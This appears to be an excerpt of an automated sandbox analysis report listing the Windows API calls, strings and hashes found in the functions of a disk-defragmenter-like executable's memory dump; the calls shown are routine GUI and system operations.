                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,0000000C,0000000C,?,?,?,?,?,?,?,004619AE), ref: 004629EC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                • String ID: FAT$FAT16$FAT32
                                                                                                                                                                                                                                                                                                • API String ID: 2039140958-3969911809
                                                                                                                                                                                                                                                                                                • Opcode ID: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                                • Instruction ID: 45468f2d8361374e2203d088d382e4daaec04f6418c830f46f854969d88bf3c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 254a78ae61a87bb598648bcb239176478e62f78007c312b98b488536b990b747
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16112175A18300AED754EF789D92B6B77E4AF88704F84492EF848C3251F678D604CB9B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                                • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                                • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction ID: 02bff0ae68159748c7f69b0dc43338cfbe1eaa20307d0c92b455edf88c414399
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 481184B574470097C3209B64DC81FEAB3A56F88750F20871FF26FA72D1C7A4B8419788
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetRectEmpty.USER32(0000000C), ref: 0040DE94
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: EmptyRect
                                                                                                                                                                                                                                                                                                • String ID: Button$CDoubleDraw$Default
                                                                                                                                                                                                                                                                                                • API String ID: 2270935405-580154339
                                                                                                                                                                                                                                                                                                • Opcode ID: bc3e2d6f8ce831d7bf007855c4c2d232e2bdea8988ba371b820240db3263b0bd
                                                                                                                                                                                                                                                                                                • Instruction ID: ef19d2a367d3f1db560aaf5cf05e81b0258e296f30c95c9ac20d7302b86fa88f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc3e2d6f8ce831d7bf007855c4c2d232e2bdea8988ba371b820240db3263b0bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C611ABB1A447119BD3109F56CC42B97B6E8EB48B24F108A2FF519E72C1D7BC680447DD
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Defer$BeginRedraw
                                                                                                                                                                                                                                                                                                • String ID: Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 2284443614-1860365581
                                                                                                                                                                                                                                                                                                • Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM ref: 0041E210
                                                                                                                                                                                                                                                                                                • mciGetErrorStringW.WINMM(00000000,?,00000080), ref: 0041E23D
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CommandSend$ErrorString
                                                                                                                                                                                                                                                                                                • String ID: %s/n
                                                                                                                                                                                                                                                                                                • API String ID: 1543859921-1476993579
                                                                                                                                                                                                                                                                                                • Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?), ref: 0040152C
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
                                                                                                                                                                                                                                                                                                • String ID: >=
                                                                                                                                                                                                                                                                                                • API String ID: 1500692541-3263226258
                                                                                                                                                                                                                                                                                                • Opcode ID: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a3b4bfc414dc10881e7eec236f3a1e04021e9235cedc72d475739dca07e05aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C01A5725043119BC710EF18D885AEFB7E8BFC4358F04892EF588AB260D738DA09C796
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415319,?,?,1088D068,?,?,00000000,1088D068,?,1088D068,?,00000000,00000000), ref: 00415253
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00415264
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-158344479
APIs
• GetModuleHandleW.KERNEL32(?,00415489,?,?,1088D068,?,?,00000000,004070E8,?,1088D068,?,00000000,00000000), ref: 004153D0
• LoadLibraryW.KERNEL32(?), ref: 004153E1
• GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
Strings
• ImageList_GetImageCount, xrefs: 004153F5
Memory Dump Source
• Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_111392827.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: ImageList_GetImageCount
• API String ID: 310444273-4246500564
APIs
• GetModuleHandleW.KERNEL32(?,00403E46,?,?,1088D068), ref: 00403DA0
• LoadLibraryW.KERNEL32(?), ref: 00403DB1
• GetProcAddress.KERNEL32(00000000,ImageList_AddMasked), ref: 00403DCB
Strings
Memory Dump Source
• Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_400000_111392827.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID: ImageList_AddMasked
• API String ID: 310444273-822293376
APIs
• GetCurrentProcess.KERNEL32(00000040), ref: 00423E73
• SetPriorityClass.KERNEL32(00000000), ref: 00423E7A
Strings
Memory Dump Source
• Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                                • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                                • Opcode ID: 4fd6964c920d56df250ae9ab2acb6b08c2f321825b7161079fb8931e388946b9
                                                                                                                                                                                                                                                                                                • Instruction ID: 65e6db7a757ac2f859af6c567d4dd87af2ab39161d08e9a40c4738524f0132bc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fd6964c920d56df250ae9ab2acb6b08c2f321825b7161079fb8931e388946b9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3D05BB1580300BFE2006B90CC4EF553654EB00705F504419BB09950E2C6F55188C7AE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020), ref: 00423E33
                                                                                                                                                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 00423E3A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                                • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                                • Opcode ID: 127201b981698b300859cc31292a0172134846cda05812359d7de4f29bee327f
                                                                                                                                                                                                                                                                                                • Instruction ID: 0765593b2bd4a548dc4285e73e255d63b39630105a75dc21cbbf118713a2a5a8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 127201b981698b300859cc31292a0172134846cda05812359d7de4f29bee327f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DD05B71580300BBE1006B90CC4EF553658EB00705F50441DBB09950E2C6F45188C76A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000080), ref: 00423EB6
                                                                                                                                                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 00423EBD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                                • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                                • Opcode ID: 08ddfa592c1efdcbccc132c313bf1a44a42ddabc710bc291cfdf7ca59a51bf9a
                                                                                                                                                                                                                                                                                                • Instruction ID: cd9b91bb96566d5ac382291ffc385f6ffd504ff47ee525bf2600b2da5630117b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08ddfa592c1efdcbccc132c313bf1a44a42ddabc710bc291cfdf7ca59a51bf9a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D05EB1680301BFE200ABD0CC4EF5A3668EB00B05F90881DFB09950E2CAF45188CBAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 893888af18e71582d7d8a6e2594258244a1919dfa8c6d50e086ea7ae5b819a09
                                                                                                                                                                                                                                                                                                • Instruction ID: 8331d68c480371aadc1d9719c9c5c183a05d30e21e2b40b16138d506a35b66a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 893888af18e71582d7d8a6e2594258244a1919dfa8c6d50e086ea7ae5b819a09
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE51CFB6605203AFDB299F54D845BAEBFA4FF40310F24992DEA05872D1E731AC91CF90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C88F
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 166717107-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction ID: 1ae2c4f83a303b8bce0181d8b555b548ed397ea70dfa58a9d15d9eacc3878f9d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b63bd0a3e2817953073069a49dd37508e5c619b6a8f1caab7bdc8737ebf16daf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC511AB1204301AFD714DE28CD85FABB7EAFBC4704F008A1DF99953694DBB0AD49CA65
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00410AB3
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00410AC5
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00410AFA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414FD0: GetParent.USER32(?), ref: 00414FD4
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 00410AE5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Parent$CriticalEnterMessageRedrawSectionSendWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1290606431-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                                • Instruction ID: 5206ba9288f2f952280e77a0a87cb2f91fe58ff6aeb235107940afbc2e9b071e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 143fed41e4f3855d081119d730e229c73714f0bc93d99b8b5aa2bb9d49ef1950
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5631B1723087049BD320DF64DC81F9BB3A4FB98720F10461EE9498B780DB79E841CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClearVariant$AllocString
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2502263055-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                                • Instruction ID: d31ef5bb5228e6c3ad645c8f3d1319e11389829958ef149dbed2cab14c92e82a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15316F722087059FC310CF58C880B5BB7E8EF88718F104A2EF95997350DB79E909CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                                • Instruction ID: ce4c3b2ba86c6f6c119685c1f909f4ca062621dcfedb5de8325838dac45ff1a4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2314071244305AFD204DF61CCC5FABB3E9EBC8748F048A0CF58957290D674EA468B65
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 0040F162
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040F17A
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040F19B
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0040F210
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ClientMessageRectReleaseSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1863454828-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction ID: d6bf508d08b3a67db9d2b0dabc6a54fdde4e7c081a099a00f88e8aa49dac70a3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d11ef34d3e0fffcceb367614637f6adb86afbda3cb939e7e07ff16f8205efc76
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C3128B5204341AFC314DF68C984E5AB7E9FB88610F104A1EF559C3290EB34A905CB55
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3839614884-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                                • Instruction ID: 61ee5ff977679a68600c6b3ba5455a9d5faea7aa6e4a004e82da9cd24f1d17ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6861e29f0088fe8bf2482069452547d46f2b3a812a60965592cc082a0fa155da
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B21D2B6608351AFC310DE59D880E6BBBE8EBD9305F00495DF8849B302D275EC458BB6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                                • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                                • API String ID: 451317006-1228882529
